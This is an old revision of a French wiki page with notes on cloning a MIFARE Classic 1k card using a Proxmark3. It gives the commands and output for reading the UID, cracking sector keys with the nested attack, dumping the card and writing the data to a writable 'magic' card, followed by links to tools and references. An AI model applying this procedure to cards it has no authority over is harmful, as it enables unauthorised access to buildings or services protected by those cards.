Ceci est une ancienne révision du document !
https://github.com/Proxmark/proxmark3
S'assurer qu'on a la dernière version du firmware et bootloader
Mettre à jour le firmware : https://www.youtube.com/watch?v=MziySohCY6s
Afficher l'uid de la carte que je veux cloner
proxmark3> hf search
#db# DownloadFPGA(len: 42096)
UID : ad 4e a5 45
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Valid ISO14443A Tag Found - Quitting Search
Casser les clefs de la carte
proxmark3> hf mf nested 1 0 A ffffffffffff d
Testing known keys. Sector count=16
nested…
uid:bc4ea535 trgbl=4 trgkey=0
Found valid key:080808080808
uid:bc4ea535 trgbl=8 trgkey=0
Found valid key:080808080808
Time in nested: 7.832 (3.916 sec per key)
Iterations count: 2
— | —————- | — | —————- | — |
sec | key A | res | key B | res |
— | —————- | — | —————- | — |
000 | ffffffffffff | 1 | ffffffffffff | 1 |
001 | 080808080808 | 1 | ffffffffffff | 1 |
002 | 080808080808 | 1 | ffffffffffff | 1 |
003 | ffffffffffff | 1 | ffffffffffff | 1 |
004 | ffffffffffff | 1 | ffffffffffff | 1 |
005 | ffffffffffff | 1 | ffffffffffff | 1 |
006 | ffffffffffff | 1 | ffffffffffff | 1 |
007 | ffffffffffff | 1 | ffffffffffff | 1 |
008 | ffffffffffff | 1 | ffffffffffff | 1 |
009 | ffffffffffff | 1 | ffffffffffff | 1 |
010 | ffffffffffff | 1 | ffffffffffff | 1 |
011 | ffffffffffff | 1 | ffffffffffff | 1 |
012 | ffffffffffff | 1 | ffffffffffff | 1 |
013 | ffffffffffff | 1 | ffffffffffff | 1 |
014 | ffffffffffff | 1 | ffffffffffff | 1 |
015 | ffffffffffff | 1 | ffffffffffff | 1 |
— | —————- | — | —————- | — |
Printing keys to binary file dumpkeys.bin…
Dumper les données de la carte
proxmark3> hf mf dump
—————————————– |
—— Reading sector access bits…—– |
—————————————– |
#db# READ BLOCK FINISHED
…omitted for brevity…
#db# READ BLOCK FINISHED
—————————————– |
—– Dumping all blocks to file… —– |
—————————————– |
#db# READ BLOCK FINISHED
Successfully read block 0 of sector 0.
…omitted for brevity…
Successfully read block 3 of sector 15.
Dumped 64 blocks (1024 bytes) to file dumpdata.bin
Mettre le uid sur la magic card avec uid modifiable
hf mf csetuid ad4ea545
Mettre les données sur la magic card avec uid modifiable
hf mf restore
script run remagic
utiliser :
bindiff
https://www.zynamics.com/software.html
PatchDiff2 avec ida sinon
Diaphora avec ida
hxd
ultracompare aussi (shareware)
hexdump.exe
sous linux : binwalk
encours de construction ..
https://github.com/Proxmark/proxmark3/wiki/Mifare-HowTo
https://github.com/Proxmark/proxmark3/wiki/Mifare-Tag-Ops
https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
https://github.com/Proxmark/proxmark3/wiki/Generic-ISO15693-Ops
https://github.com/Proxmark/proxmark3/wiki/Mifare-Tag-Ops
Black Hat, Sao Paulo 2014 https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Almeida-Hacking-MIFARE-Classic-Cards-Slides.pdf